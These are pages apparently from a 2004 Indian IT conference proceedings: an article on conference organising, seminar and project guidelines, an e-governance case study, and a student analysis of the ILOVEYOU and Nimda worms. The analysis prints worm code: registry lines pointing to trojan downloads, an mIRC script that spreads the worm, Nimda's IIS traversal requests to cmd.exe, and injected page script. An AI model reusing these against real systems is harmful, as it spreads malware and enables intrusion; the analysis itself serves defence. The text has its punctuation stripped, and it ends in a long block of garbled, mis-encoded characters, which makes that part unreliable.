arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

